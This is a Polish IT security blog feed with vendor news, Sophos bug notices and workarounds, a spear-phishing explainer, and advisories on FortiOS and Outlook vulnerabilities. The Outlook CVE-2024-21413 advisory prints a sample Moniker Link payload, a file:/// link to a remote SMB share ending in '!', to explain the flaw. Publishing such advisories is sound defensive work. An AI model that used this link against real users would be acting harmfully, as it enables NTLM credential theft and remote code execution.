Po zaktualizowaniu Sophos UTM do wersji 9.719, a więc najnowszej, aplikacja IPS/Snort ulega awarii. W trakcie ponownego uruchamiania silnika produktu możesz zaobserwować tymczasowe problem z obsługą ruchu. Poniżej znajdują się informacje dotyczące tego, jak zapobiec awarii IPS po aktualizacji.
Produkty i środowiskoSophos UTM 9.719
Chronologia wystąpienia i analizy problemuAwaria IPS/Snort powoduje chwilową przerwę w obsłudze ruchu podczas restartu silnika.
Informacje o wersjiTen problem dotyczy tylko wersji Sophos UTM 9.719, a więc najnowszej.
RozwiązanieWydano poprawkę (pattern update), która naprawia ten problem.
Użyj poniższej komendy do sprawdzenia wersji u2d-ipsbundle, aby sprawdzić, czy poprawka została zainstalowana w Twoim systemie,
# rpm -qa |grep u2d-ipsbundle2 u2d-ipsbundle2-64-9-849 Rozwiązanie tymczasowe:Gdy pojawi się aktualizacja, postaramy się dodać nowe informacje do tego artykułu.
Jednocześnie przypominamy, że dla Sophos UTM producent ogłosił End of Life. Wszystkich klientów zainteresowanych pozostaniem przy rozwiązaniach Sophos, zachęcamy do migracji do nowej serii Sophos Firewall. Nie masz pojęcia jak to zrobić? Skontaktuj się z nami – doradzimy, pomożemy i przeprowadzimy Cię krok po kroku przez ten proces,
Artykuł Sophos UTM: IPS zawiesza się po aktualizacji do wersji 9.719 pochodzi z serwisu FirewallBlog - BLOG IT.
W ślad za informacją opublikowaną przez firmę Sophos chcemy poinformować naszych klientów o obserwowanym dzisiaj problemie z deszyfrowaniem ruchu SSL/TLS. Stacje końcowe i serwery uruchomione ponownie 29 lutego 2024 roku nie są w stanie odszyfrować certyfikatów root w trakcie zestawiania połączeń HTTPS. W przeglądarce pojawis się następujący komunikat:
Problem ten występuje tylko wtedy, gdy deszyfrowanie SSL/TLS dla witryn HTTPS jest włączone w polityce ochrony przed zagrożeniami. Drugim warunkiem jest natomiast ponowne uruchomienie punktu końcowego w dniu 29 lutego 2024 roku.
Produkty i środowiskoProblem dotyczy następujących produktów
Możesz obserwować trudności z przeglądaniem internetu do czasu zastosowania tymczasowego rozwiązania. Musisz przekonfigurować Sophos Central, aby wyłączyć deszyfrowanie HTTPS.
Tymczasowe rozwiązanieDla Sophos Home:
Dla stacji i serwerów korzystających z wersji przedpremierowych w ramach Sophos EAP (Early Access Program) należy wyłączyć deszyfrowanie SSL/TLS w ustawieniach globalnych:
Sophos poinformował, że nadpisał polisę odszyfrowywania SSL/TLS. Zmiana ta będzie nadrzędna względem skonfigurowanej zasady ochrony przed zagrożeniami i zapobiegnie wystąpieniu problemu.
Producent zdecydowanie zaleca ponowne uruchomienie wszystkich dotkniętych stacji i serwerów 1 marca 2024 roku oraz jeśli to konieczne, ponowne włączenie ustawień odszyfrowywania SSL/TLS.
Uwaga: Jeśli nie zrestartujesz urządzenia, problem ten może powrócić.
Sophos planuje automatycznie przywrócić normalne obsługiwanie ustawień odszyfrowywania SSL/TLS 1 marca 2024 roku.
Artykuł Sophos Endpoint – problem z certyfikatami SSL/TLS – „Twoje połączenie nie jest prywatne” (29.02.2024) pochodzi z serwisu FirewallBlog - BLOG IT.
Intelligent Power Manager (IPM) od EATON to rozwiązanie pozwalające na monitorowanie i zarządzanie automatyzacją procesów w Twojej serwerowni.
IPM instalowany jest na serwerze zarządzającym lokalnie w DataCenter lub w pojedynczej serwerowni.
System monitoruje urządzenia zasilania w oparciu o protokół SNMP i MQTT (UPS Eaton).
Aplikacja posiada zaawansowany panel administracyjny m. in pozwalający na monitowanie parametrów lokalnego DC w tym zużycie prądu dla urządzeń IT.
Istnieje możliwość aktualizacji UPS (w tym innych dostawców). Pełnie wsparcie dla ePDU Eaton oraz masowego wdrożenia parametrów konfiguracyjnych z poziomu jednej konsoli zarządzającej.
Automatyzacja procesów IPM kompatybilna jest z systemami takich producentów jak: Microsoft (Server, Hyper-V), VMware, Niutanix, Dell-VxRail, Netapp, HP (One View).
Dzięki tak szerokiej kompatybilności, IPM Eaton pozwala na tworzenie bezpiecznych polityk wyłączania lub sekwencyjne włączanie się systemów fizycznych i maszyn wirtualnych.
Umów się na bezpłatną prezentację lub POC-a
[contact-form]
Podstawowe zalety IPM:
– ochrona danych (bezpieczne wyłączanie maszyn bez straty danych)
– ciągłość pracy (np. w środowisku zwirtualizowanym, migracja systemów/maszyn wirtualnych pomiędzy lokalizacjami by świadczyć nieprzerwaną usługę)
– oszczędność energii (możliwość budowania polityk z harmonogramem w celu wyłaczacznia/włączania systemów/urządzeń)
Artykuł Zarządzanie UPS-ami z Eaton IPM pochodzi z serwisu FirewallBlog - BLOG IT.
Spear phishing to taktyka wykorzystywana do kradzieży poufnych danych.
Czym jest Spear phishing można najlepiej poznać w pierwszym scenariuszu naszego szklenia #CompanyUnHacked.
Spear phishing od zwykłych ataków phishingowych różni ją brak masowego charakteru. W tym przypadku cyberprzestępca starannie wybiera swoją ofiarę, przeszukuje internet (szczególnie serwisy społecznościowe) pod kątem dostępnych na jej temat informacji i wykorzystuje je do działań manipulacyjnych. Choć metoda ta jest czasochłonna, cyberprzestępcy chętnie po nią sięgają z uwagi na potencjalne wysokie zyski. Ekspertka Fortinet rozkłada ten fenomen na czynniki pierwsze i podpowiada, jak się przed nim ochronić.
Metoda spear phishingu często jest wykorzystywana podczas ataków na najbardziej wpływowe podmioty. Przykładem takiej sytuacji jest incydent z 2019 roku, w wyniku którego hakerowi udało się ukraść ponad 100 tys. dolarów od Google’a i Facebooka.
Pierwszym krokiem cyberprzestępcy jest wybór ofiary. Przeważnie zostaje nią osoba posiadająca dostęp do najcenniejszych zasobów w swojej firmie. Może to być pracownik działu księgowości, ze względu na przysługujący mu wgląd do informacji o sytuacji finansowej firmy i jej klientów. Ofiarami spear phishingu bywają też osoby odpowiedzialne za zarządzanie kadrami, ponieważ mają dostęp do wrażliwych danych personelu – wyjaśnia Jolanta Malak, dyrektorka Fortinet w Polsce.
Po wytypowaniu swojego celu przestępca rozpoczyna proces zbierania szczegółowych informacji na jego temat. Krok ten wiąże się przeważnie z wykorzystaniem mediów społecznościowych. Dzięki zgromadzonej wiedzy sprawca ataku jest w stanie przedstawić się jako osoba, którą ofiara zna i darzy zaufaniem. W dalszej kolejności przestępca kontaktuje się ze swoim celem za pośrednictwem portalu społecznościowego lub poprzez przesłanie wiadomości e-mail zawierającej:
Cyberprzestępcy mierzą wysoko – czym jest whaling?
Whaling to rodzaj spear phishingu, w ramach którego za ofiarę wybierane są osoby na stanowiskach kierowniczych. Stosujący tę metodę przestępcy po nawiązaniu kontaktu ze swoją ofiarą, podają się za dyrektorów lub innych wysoko postawionych pracowników danego przedsiębiorstwa. Mogą także podszywać się pod potencjalnych dostawców. Przygotowanie ataku typu whaling wymaga od atakującego więcej czasu i przygotowań, jednak mimo tego przestępcy często decydują się na tę taktykę.
źródło informacji (modyfikowane):
SAROTA PR
Artykuł Spear phishing – dobrze przygotowany i celowy phishing pochodzi z serwisu FirewallBlog - BLOG IT.
Urządzenia Sophos Firewall XGS w niektórych wersjach posiadają porty Ethernet umożliwiające zasilanie innych urządzeń. Sophos Firewall XGS 116 oraz wersja „w”, czyli wyposażona we wbudowany access point, posiada port PoE w standardzie 802.3at (30W). Niestety, po tzw. zimnym starcie (cold start) podłączone do niego urządzenia mogą nie otrzymać wystarczającej ilości energii. Problem może występować także po tzw. cyklu zasilania (power cycle), czyli wyłączeniu i ponownym włączeniu urządzenia.
Producent poinformował, że problem ten dotyczy wyłącznie urządzeń XGS 116(w), działających na firmware w wersji 19.5.3 MR3.
ObjawyUrządzenia PoE wymagające standardu 802.3at (30W) mogą zgłaszać, że po zimnym uruchomieniu firewalla lub „cyklu zasilania” nie otrzymują wystarczającej ilości energii.
PrzyczynaW przypadku korzystania z modelu XGS 116 oraz XGS 116w, kontroler PoE domyślnie ustawiony jest na standard 802.3af (15W). To system operacyjny Sophos Firewall w wersji 19.5.3 MR3 i nowszych konfiguruje kontroler na standard 802.3at (30W). W związku z tym system operacyjny musi się uruchomić, aby urządzenie obsługiwało wyższy standard. Konieczność ta powoduje pewne opóźnienie w możliwości właściwego zestawienia zasilania PoE 802.3at.
RozwiązanieJeśli urządzenie zasilane przez PoE jest podłączone do XGS 116(w) przed zimnym startem lub „cyklem zasilania”, będzie próbować ustalić zasilanie zgodnie ze standardem 802.3af. Dopiero uruchomienie na urządzeniu systemu Sophos Firewall nadpisze ustawienia kontrolera PoE na 802.3at. Zwłoka z tego wynikająca może powodować, iż podłączone urządzenie uzna, że Sophos Firewall nie posiada wystarczającej mocy zasilania. Należy zaktualizować Sophos Firewall do wersji 19.5.3 MR3 lub nowszej, a następnie zastosować jedno z poniższych rozwiązań:
Artykuł Sophos Firewall XGS 116(w) – problemy z zasilaniem PoE 802.3at pochodzi z serwisu FirewallBlog - BLOG IT.
W ślad za producentem pragniemy podzielić się świetną informacją, że GFI KerioControl 9.4.4 został oficjalnie udostępniony. Aktualizacja ta przynosi znaczny wzrost wydajności, nowe funkcje i poprawki stabilności bazujące na opiniach użytkowników oraz uczestników programu testowania beta.
Kluczowe zmiany obejmują:Ważna informacja: GFI KerioControl 9.4.4 nie obsługuje oficjalnie urządzeń NG500 (koniec życia od 31 grudnia 2023 roku). Zalecana jest aktualizacja do nowej platformy sprzętowej NG510 lub własnego urządzenia bazującego na UEFI. Informacje na temat wsparcia dla własnego sprzętu do budowy software appliance znajdują się w zasobach na stronie producenta.
Wszystkich zainteresowanych dokładniejszym poznaniem wprowadzonych zmian odsyłamy do specjalnie przygotowanych na tę okazję przewodników. Można je znaleźć na stronie producenta, w zasobach udostępnionych w ramach sekcji produktowej dotyczącej KerioControl.
Nowa wersja GFI KerioControl 9.4.4 jest dostępna do pobrania w GFI Upgrade Center. Pełna lista zmian dla tego wydania znajduje się na stronie internetowej producenta.
Gorąco zachęcamy do aktualizacji do tej wersji, szczególnie klientów chcących korzystać z połączeń VPN na nowych urządzeniach Android.
Artykuł GFI KerioControl 9.4.4 – wzrost wydajności oraz wsparcie dla IKEv2 VPN pochodzi z serwisu FirewallBlog - BLOG IT.
Użytkownicy oprogramowania antywirusowego Sophos Intercept X, którzy jednocześnie wykorzystywali na swoich stacjach końcowych agenta Teramind, mogli napotkać nieprzyjemną niespodziankę w postaci Niebieskiego Ekranu (BSOD). Ekran ten alarmował o awarii pliku Netio.sys, wyświetlając kod błędu SYSTEM_SERVICE_EXCEPTION (3b).
Produkty i środowiska, których dotyczył problemDziały rozwoju zarówno w firmie Sophos jak i Teramind opracowały specjalne buildy w celu rozwiązania pojawiającego się problemu.
Jeśli ktoś z Państwa, doświadczył powyższego problemu prosimy o kontakt z supportem Sophosa, bądź z nami w celu uzyskania dostępu do wymienionego builda.
Alternatywne obejście problemuDo czasu zaktualizowania oprogramowania, można tymczasowo obejść problem, wyłączając kilka kluczowych ustawień:
Real time Scanning Internet
– skanowanie pobieranych plików
– blokada dostępu do złośliwych stron internetowych
Web Control Policy
-musi zostać całkowicie wyłączona
Z uwagi na nieprzewidziane skutki do jakich może prowadzić implementacja tego typu ustawień, zdecydowanie bardziej polecamy uzyskanie dostępu do specjalnie opracowanego builda, dzięki któremu zapewnicie Państwo stabilne działanie swoich systemów bez konieczności rezygnacji z ważnych funkcji ochronnych.
Artykuł Błąd krytyczny na stacjach końcowych z Sophosem i Teramind pochodzi z serwisu FirewallBlog - BLOG IT.
Nowa krytyczna podatność w Microsoft Outlook umożliwia zdalnym atakującym exploitację i omijanie widoku chronionego aplikacji wchodzących w skład pakietu Office.
Podatność odkrył badacz Check Point – Haifei Li. Oznaczono ją jako CVE-2024-21413. Dzięki niej możliwe jest zdalne wykonanie kodu (RCE), gdy w Outlooku otwierane są e-maile zawierające złośliwe linki. Atakujący mogą także obejść widok chroniony, przeznaczony do blokowania szkodliwej zawartości w plikach Office. Takie linki powodują otwarcie pliku w trybie edycji, zamiast odczytu.
Gigant z Redmond ostrzega, że wektorem ataku jest panel podglądu, umożliwiający udany atak nawet podczas przeglądania złośliwie spreparowanych dokumentów Office. Nieuwierzytelnieni atakujący mogą zdalnie wykorzystać CVE-2024-21413 w atakach o niskim stopniu skomplikowania. Użytkownik nie musi podejmować żadnej interakcji, aby stać się ofiarą.
„Atakujący, który pomyślnie wykorzysta tę lukę, mógłby uzyskać szerokie uprawnienia, obejmujące funkcje odczytu, zapisu i usuwania”, wyjaśnia Microsoft. Atakujący mogą stworzyć złośliwy link, który omija protokół widoku chronionego. Tym samym może prowadzić to do ujawnienia lokalnych informacji uwierzytelniających NTLM i zdalnego wykonania kodu (RCE).
Podatność CVE-2024-21413 dotyczy wielu produktów Office, w tym:
Badacze z firmy Check Point opisują podatność jako Moniker Link. Pozwala ona atakującym obejść wbudowane zabezpieczenia Outlook dla złośliwych linków osadzonych w e-mailach. Atak polega na wykorzystaniu protokołu file:// i dodaniu znak wykrzyknika do adresu URL, wskazującego na serwery kontrolowane przez napastników.
<a href="file:///\\10.0.0.1\exploit\exploit.rtf!cokolwiek">Niezwykle bezpieczny link</a>Hiperłącze omija zabezpieczenia Outlooka, a sam Outlook uzyskuje dostęp do zdalnego zasobu „\\10.0.0.1\exploit\exploit.rtf” po kliknięciu w link. Nie generuje przy tym żadnych ostrzeżeń czy błędów.
Podatność ta wynika z niebezpiecznego API MkParseDisplayName, które może wpłynąć na inne oprogramowanie korzystające z tego interfejsu.
Ataki wykorzystujące CVE-2024-21413 mogą skutkować kradzieżą informacji uwierzytelniających NTLM oraz wykonaniem dowolnego kodu przy użyciu złośliwiych dokumentów Office.
Check Point potwierdza obecność błędu Moniker Link w najnowszych środowiskach Windows 10/11 + Microsoft 365 (Office 2021). Specjaliści z tej firmy zalecają wszystkim użytkownikom Outlooka natychmiastową instalację oficjalnej łatki.
Artykuł Krytyczna podatność w Microsoft Outlook pochodzi z serwisu FirewallBlog - BLOG IT.
MailStore w wersji V23.4 wprowadza liczne usprawnienia jednego z najlepszych rozwiązań do archiwizacji poczty elektronicznej. Nowa wersja dostępna jest jako MailStore Server (dla klientów posiadających własne rozwiązanie), MailStore Service Provider Edition (SPE) i MailStore Home. Wśród nowości znajdują się opcje zwiększające funkcjonalność, szczególnie oczekiwane zarówno przez administratorów, jak i użytkowników. Poniżej przedstawiamy kluczowe elementy MailStore V23.4:
Archiwizacja raportów NDR z alternatywnej skrzynki journalingowej:Wraz z wersją MailStore V23.4, producent stawia sobie za cel usprawnienie procedury archiwizacji, oferując zaawansowane funkcje i odpowiadając na potrzeby użytkowników, co czyni tę aktualizację potencjalnie wartościową dla wszystkich organizacji korzystających z rozwiązań MailStore.
Gorąco zachęcamy do wykonania aktualizacji, ponieważ oprócz wspomnianych usprawnień, producent nieustannie rozwija produkt pod kątem bezpieczeństwa i kompatybilności. Zwracamy jednocześnie uwagę, iż wraz z wprowadzaniem nowych wersji produktu, zmieniają się wymagania systemowe. W ostatnim czasie producent zakończył wsparcie dla niewspieranych wersji WIndows Server 2012 i 2012R2, a także Exchange Server 2003.
Artykuł MailStore V23.4 – archiwizacja NDR i możliwość kasowania oflagowanych wiadomości pochodzi z serwisu FirewallBlog - BLOG IT.
Producent rozwiązań z zakresu bezpieczeństwa – Kerio Control oraz serwera pocztowego – Kerio Connect przedstawił kluczowe daty i szczegóły dotyczące zakończenia wsparcia dla usługi centralnego zarządzania i alertowania – MyKerio. Jednocześnie przedstawił propozycję przejścia na nowe rozwiązanie – GFI AppManager.
To właśnie zrozumienie zróżnicowanych potrzeb różnych klientów skłoniło firmę GFI do podzielenia tej operacji. Zakończenia wsparcia dla MyKerio oraz przejście do GFI AppManager rozłożono na trzy fazy:
Dzięki takiemu harmonogramowi, przeniesienie obsługi wdrożeń wszelkich rozmiarów do GFI AppManager będzie łatwiejsze. Tym samym wszyscy klienci będą dysponować dostatecznym czasem przeznaczonym na migrację dla każdego rozwiązania.
Szczególnie zachęcamy użytkowników GFI KerioControl oraz GFI KerioConnect do wykonania aktualizacji do najnowszych wersji produktów (KerioControl 9.4.3 patch 4 oraz KerioConnect 10.0.4), aby zapewnić płynny przebieg migracji. Najnowsza wersja zapory sieciowej, podobnie jak i serwera pocztowego oferują znaczne ulepszenia wydajności i kompatybilność z GFI AppManager.
Kroki do pomyślnego przejścia na GFI AppManager:
W razie problemów służymy wsparciem wszystkim klientom, którzy posiadają aktywne subskrypcje i zakupili produkty za naszym pośrednictwem. Jeśli masz dodatkowe pytania, zawsze możesz do nas napisać za pośrednictwem formularza.
Szczegółowe informacje na temat dostępności GFI AppManager oraz zakończenia wsparcia dla MyKerio można znaleźć w dokumencie FAQ na stronie producenta.
Artykuł Zakończenie wsparcia dla MyKerio oraz przejście do GFI AppManager pochodzi z serwisu FirewallBlog - BLOG IT.
Wraz z producentem oprogramowania – firmą Sophos, pragniemy poinformować, że na sobotę 17 lutego zaplanowano prace wiążące się z czasową niedostępnością części usług. Konserwacja portalu Sophos Central Admin będzie miała wpływ m.in. na aktywację i generowanie licencji dla produktów. Operacja rozpocznie się o godzinie 14:00 UTC (15:00 CET) i planowo potrwa około 6 godzin. W jej trakcie następujące zadania związane z obsługą licencji będą niedostępne:
Gdy spróbujesz zrealizować powyższe zadania, zobaczysz następujący komunikat: „Our licensing systems are under maintenance. Please retry your request in a few hours.”
Okno serwisowe zaplanowane jest na 6 godzin (15:00 – 21:00).
Trzymamy kciuki, aby i tym razem wszystko poszło zgodnie z planem, a konserwacja potrwała jak najkrócej. Jednocześnie przypominamy, iż Sophos Central to platforma chmurowa, dzięki której możliwe jest zarządzanie wszystkimi elementami ochrony od Sophos z jednego, wspólnego miejsca. Dzięki temu, że jest ona darmowa, każdy klient Sophos (nie tylko posiadający rozwiązania Intercept X czy Email), może wykorzystać centralne zarządzanie m.in.: Firewallami czy Access Pointami. Konsola Sophos Central to także jedno miejsce do zbierania logów i alertów ze wszystkich produktów z portfolio producenta. Dzięki takiemu podejściu, codzienne zarządzanie rozwiązaniami producenta z Abingdon jest nie tylko szybsze, ale i łatwiejsze.
Artykuł Sophos Central Admin – konserwacja w sobotę 17 lutego pochodzi z serwisu FirewallBlog - BLOG IT.
Wczoraj został opublikowany przez producenta komunikat dotyczący krytycznej podatności w usłudze VPN działającej w różnych wersjach systemu operacyjnego FortiOS. Pod jego kontrolą pracują znane i lubiane przez polskich administratorów urządzenia FortiGuard. Podatność daje możliwość zdalnemu, nieuwierzytelnionemu atakującemu wykonanie arbitralnego kodu lub polecenia za pomocą specjalnie spreparowanych żądań HTTP.
Rozwiązanie tymczasowe, które proponuje producent, to wyłączenie w FortiOS funkcjonalności VPN SSL (wyłączenie trybu webowego NIE stanowi rozwiązania problemu).
Uwaga: Podatność może być potencjalnie wykorzystywana w środowiskach produkcyjnych.
Poniżej przedstawiamy listę wersji FortiOS wraz z konkretnymi wariantami i informacją o ich podatności oraz rozwiązaniu.
Wersja Dotyczy RozwiązanieFortiOS 7.6
Niedotyczy
Niewymagane
FortiOS 7.4
7.4.0 do 7.4.2
Aktualizacja do 7.4.3 lub wyższej
FortiOS 7.2
7.2.0 do 7.2.6
Aktualizacja do 7.2.7 lub wyższej
FortiOS 7.0
7.0.0 do 7.0.13
Aktualizacja do 7.0.14 lub wyższej
FortiOS 6.4
6.4.0 do 6.4.14
Aktualizacja do 6.4.15 lub wyższej
FortiOS 6.2
6.2.0 do 6.2.15
Aktualizacja do 6.2.16 lub wyższej
FortiOS 6.0
6.0 wszystkie wersje
Migracja do poprawionej wersji
Artykuł FortiOS – podatność w funkcjonalności VPN pochodzi z serwisu FirewallBlog - BLOG IT.
Dzisiaj (tj. 07.02.2024r.) wielu klientów Sophos mogło zauważyć niepokojący komunikat dotyczący problemu z instalacją składnika Sophos File Scanner. Choć problem nie powodował negatywnych konsekwencji, to skutkował pojawieniem się wyskakującego ostrzeżenia na urządzeniu. W wyniku tego problemu, po wejściu w agenta ochrony Sophos, użytkownicy mogli zobaczyć następujące ostrzeżenia:
Plik dziennika instalacji Sophos File Scanner w lokalizacji C:\Windows\Temp\Sophos File Scanner Install Log […].txt zawiera następujące linie:
I Begin IProductSetup2::Install for Sophos File Scanner
A Constructing installer for Sophos File Scanner
A SFS already installed. Start update.
I Running: SFS Installer
I Executing step: Verify the installset is valid
W Install verification failed with error 2: Failed to load signerrep.dat
E Failed step: Verify the installset is valid, rolling back previous steps
W Failed composite step
I Execution failed: SFS Installer
E Action failed; reboot is not required
I End product setup
Sophos Central Windows Endpoint
WpływChociaż błąd wskazuje na niepowodzenie instalacji, jest to tylko informacja o trudnościach w ładowaniu najnowszych danych lokalnej reputacji Sophos File Scanner. W rezultacie program będzie korzystał z istniejących danych. Pomimo wyświetlanego ostrzeżenia, ochrona działa nadal w pełnym zakresie.
Producent wypuścił już poprawkę, która rozwiązuje ten problem. Zainstaluje się ona automatycznie wraz z kolejną aktualizacją. Po jej zainstalowaniu nie jest konieczne przeprowadzenie restartu urządzenia. W rezultacie poprawnej instalacji, status urządzenia w graficznym interfejsie zostanie zmieniony na „Twoje urządzenie jest chronione”.
Artykuł Sophos Intercept X dla Windows: Błąd instalacji skanera plików Sophos pochodzi z serwisu FirewallBlog - BLOG IT.
IceWarp na bieżąco wprowadza zaawansowane technologie, jak AI do swoich usług i nieustannie pracuje nad usprawnieniem codziennej pracy swoich klientów. Producent przykłada dużą wagę do integracji różnych rozwiązań, w tym także opartych na sztucznej inteligencji. Rozwiązania AI pomagają poprawić efektywność i oszczędzić czas.
ChatGPTIceWarp Server w najnowszej wersji pozwala na integrację z ChatGPT. Jest to chatbot wykorzystujący model GPT sztucznej inteligencji, który pomaga w tworzeniu tekstu. Można go używać do odpowiadania na pytania, generowania pomysłów, otrzymywania spersonalizowanych rekomendacji lub po prostu do swobodnych rozmów.
ChatGPT może również pomóc w tworzeniu gramatycznie poprawnych i zwięzłych wiadomości o odpowiednim tonie i dokładnych informacjach. Jeśli potrzebujesz podsumowania długiej korespondencji, przeglądu gramatyki, tłumaczenia, szybkiej odpowiedzi, itp., możesz skorzystać z asystenta ChatGPT w:
Oczywiście nadal możesz korzystać z ChatGPT jak dotychczas, klikając ikonkę w prawym górnym rogu i wpisując pytanie do okna czatu.
Dzięki pomocy ChatGPT możesz w mgnieniu oka sprawdzić gramatykę swoich tekstów, generować odpowiedzi, tłumaczyć wiadomości na różne języki, poprawiać ton swoich e-maili i otrzymywać wszelkie informacje ogólne.
Aktywacja ChatGPTAby aktywować ChatGPT w kliencie webowym IceWarp:
Uwaga: Aktywując ChatGPT, zgadzasz się, że IceWarp nie ponosi już odpowiedzialności za ochronę danych udostępnionych stronie trzeciej.
Artykuł Rozszerzenie funkcjonalności IceWarp Server o sztuczną inteligencję (AI) pochodzi z serwisu FirewallBlog - BLOG IT.
Jest nam niezmiernie miło poinformować, że oprogramowanie Sophos po raz 14. znalazło się w ćwiartce liderów raportu Gartner® Magic Quadrant 2023 w kategorii platform do ochrony stacji końcowych.
Zagrożenia się zmieniają, a Sophos nadal cieszy się uznaniemJest to dowód nieustannej innowacyjności, głębokiej wiedzy na temat zagrożeń i ciągłego dostosowywania produktu do zmieniających się realiów. Dzięki elastycznemu podejściu do tworzenia systemów bezpieczeństwa, rozwiązania Sophos chronią klientów nawet przed najbardziej zaawansowanymi przeciwnikami. Obecność w rankingu jest najwyższym uznaniem, jakim darzą rozwiązania producenta z Abingdon nie tylko klienci, ale również niezależne instytucje badawcze.
Wybierz ochronę, która działa dla Ciebie i z TobąSophos Endpoint (Intercept X) zapewnia niezrównaną ochronę przed zagrożeniami oraz potężne narzędzia EDR i XDR. Wynika to z tego, że producent stworzył swój produktu do pracy w rzeczywistych środowiskach i wobec rzeczywistych zagrożeń. Jego główne cechy obejmują:
Oferta Sophos to nie tylko ochrona dla stacji końcowych i serwerów. Producent w ramach swojego portfolio oferuje również m.in.:
Mając na uwadze, iż pojedynczy element systemu bezpieczeństwa nie jest w stanie samodzielnie zapewnić ochrony, nasza firma wprowadziła dodatkowo do oferty szkolenia z cyberbezpieczeństwa. Nasz autorski produkt – Company (Un)Hacked stanowi innowacyjny koncept dedykowany kształceniu kadr wszelkiej wielkości firm i instytucji. Wykorzystanie wirtualnej rzeczywistości czyni nasze rozwiązanie skutecznym, a także ciekawym dla każdego kursanta. W ramach rozgrywki łączymy edukację oraz natychmiastową weryfikację zdobytej wiedzy. Osoby przeszkolone w ramach naszego kursu otrzymują automatycznie certyfikat jego ukończenia.
Zachęcamy do umawiania się z nami, aby mieć możliwość przetestowania we własnych warunkach naszego rozwiązania.
Artykuł Oprogramowanie Sophos po raz 14. liderem w raporcie Gartner® Magic Quadrant™ pochodzi z serwisu FirewallBlog - BLOG IT.
W dniu 24 stycznia 2023 r. mieliśmy przyjemność uczestniczyć w niezwykle istotnym wydarzeniu, które zorganizowaliśmy wspólnie z naszym renomowanym partnerem z Czech – firmą Zebra Systems. To wyjątkowe spotkanie, które miało miejsce w malowniczej Pradze, stanowiło kulminację naszej dotychczasowej współpracy. Podczas tego wydarzenia, Zebra Systems stał się oficjalnym dystrybutorem naszej aplikacji do szkoleń z cyberbezpieczeństwa – Company (Un)Hacked na terytorium Czech i Słowacji.
Czym jest Company (Un)hacked oraz co wyróżnia ten produkt na tle innych szkoleń?Company (Un)Hacked wyróżnia się na rynku dzięki swojemu unikalnemu podejściu do edukacji w dziedzinie cyberbezpieczeństwa. Uczestnicy, używając gogli VR, wykonują różne „zlecenia” hackerskie. Ta immersyjna symulacja pozwala zrozumieć, jak wyglądają ataki z perspektywy napastnika oraz co jest kluczowe w rozwijaniu skutecznych strategii obronnych. Marek Prorok, kierownik sprzedaży w ramach projektu „Company (Un)Hacked” w Zebra Systems, stwierdził, iż – „Wyjątkowość tego projektu polega na tym, że szkolenie ma formułę dynamicznej akcji a nie nudnej, nie przyciągającej uwagi prezentacji”.
Uczestnicy wydarzenia wykazali ogromne zainteresowanie naszym rozwiązaniem, aktywnie uczestnicząc w szkoleniu VR i konkursie, który odbył się po przejściu dziesiątego scenariusza. Scenariusz ten, opracowany w formie rywalizacji o zdobycie jak największej liczby punktów, przyniósł zwycięzcy miły upominek od Sun Capital. Atmosfera spotkania, pomimo wagi wydarzenia, była bardzo swobodna, a uczestnicy byli zaskoczeni, jak wiele mogą nauczyć się w tej wygodnej i łatwej do przyswojenia formie.
Jaki jest nasz cel?Nasze szkolenie „Company (Un)Hacked„, stworzone przez ekspertów w dziedzinie cyberbezpieczeństwa, odpowiada na rosnące zapotrzebowanie rynku na innowacyjne i efektywne metody edukacji. Współpracując z Zebra Systems, rozszerzamy zasięg naszych szkoleń, zapewniając firmom w Czechach i na Słowacji dostęp do zaawansowanej technologii edukacyjnej.
Jesteśmy pełni optymizmu co do efektów tej współpracy i z niecierpliwością oczekujemy kolejnych sukcesów. Wierzymy, że nasze działania przyczynią się do podniesienia poziomu świadomości i kompetencji w zakresie cyberbezpieczeństwa, czyniąc ten obszar nie tylko kluczowym elementem strategii biznesowej, ale także fascynującą podróżą w świat technologii i innowacji.
Zachęcamy do śledzenia naszych działań na naszych kanałach w mediach społecznościowych, takich jak Facebook, LinkedIn i Instagram, aby być na bieżąco z najnowszymi informacjami i wydarzeniami związanymi z Company (Un)Hacked.
Artykuł Company (Un)Hacked i Zebra Systems Rewolucjonizują Rynek Cyberbezpieczeństwa w Czechach i na Słowacji pochodzi z serwisu FirewallBlog - BLOG IT.
Podczas rejestracji urządzeń iOS w ramach programu DEP (Device Enrollment Program) firmy Apple i instalacji aplikacji Sophos Mobile Control, urządzenie pozostaje w stanie „Enrolling”. Uruchomienie aplikacji Sophos Mobile Control na urządzeniu iOS nie inicjuje synchronizacji. Po naciśnięciu sekcji „Corporate management”, aplikacja się zawiesza.
Produkty i środowiskoUrządzenia iOS, na których zainstalowano aplikację Sophos Mobile Control podczas rejestracji w programie DEP, pozostają w statusie „Enrolling”. Aplikacja SMC musi się zsynchronizować, aby urządzenie uzyskało status „Managed”. Do momentu poprawnego zsynchronizowania aplikacji, urządzenia pozostaną w stanie „Enrolling”.
RozwiązanieObecnie deweloperzy Sophos analizują problem. Jako tymczasowe rozwiązanie spróbuj dezaktywować opcję „Install SMC app” w profilu programu Apple DEP.
Zastosuj się do poniższych kroków, aby poprawnie wyłączyć instalację aplikacji SMC w ramach Apple DEP:
Gdy wykonasz te czynności, rejestrowane urządzenia zostaną prawidłowo dodane do Sophos Central Mobile i będą widoczne jako „Managed”.
Jeśli chcesz zainstalować aplikację Sophos Mobile Control, upewnij się, że dla urządzeń skonfigurowano adres e-mail. Następnie rozdystybuuj aplikację, korzystając z zadania „Install app” wraz z akcją „Reconfigure SMC app”. Szczegóły dotyczące aktywacji aplikacji zostaną wysłane na skonfigurowany adres e-mail.
Artykuł Niepoprawna konfiguracja aplikacji Sophos Mobile Control podczas instalacji w ramach Apple DEP pochodzi z serwisu FirewallBlog - BLOG IT.
28 stycznia 2024 roku wygasa certyfikat używany przez Sophos w ramach wcześniejszego mechanizmu aktualizacji SDDS2, co skutkuje raportowaniem błędu przez każde urządzenie, które nadal próbuje aktualizować się przy użyciu SDDS2.
Kogo dotyczy:Problem z aktualizacją nie występuje u większości użytkowników rozwiązań Sophos. Architektura systemu aktualizacji została zmodyfikowana w sierpniu 2023 roku, gdy został wdrożony nowy mechanizm aktualizacji o nazwie SDDS3. Od tego czasu stacje korzystają z nowego mechanizmu aktualizacji (o ile zostały zrestartowane).
W razie ewentualnych błędów aktualizacji po tej dacie, producent sugeruje poszukać w logach poniższych linii:
Pojawiają się one, ponieważ w dniu 28 stycznia 2024 roku wygasa certyfikat używany przez ten system. Od tego momentu system operacyjny przestaje walidować certyfikat, co skutkuje niepowodzeniem aktualizacji.
Co należy zrobić:Zrestartuj urządzenie, aby uruchomić proces migracji z SDDS2 do SDDS3. Spowoduje to również aktualizację do najnowszej wersji agenta głównego (Core Agent) działającego na urządzeniu.
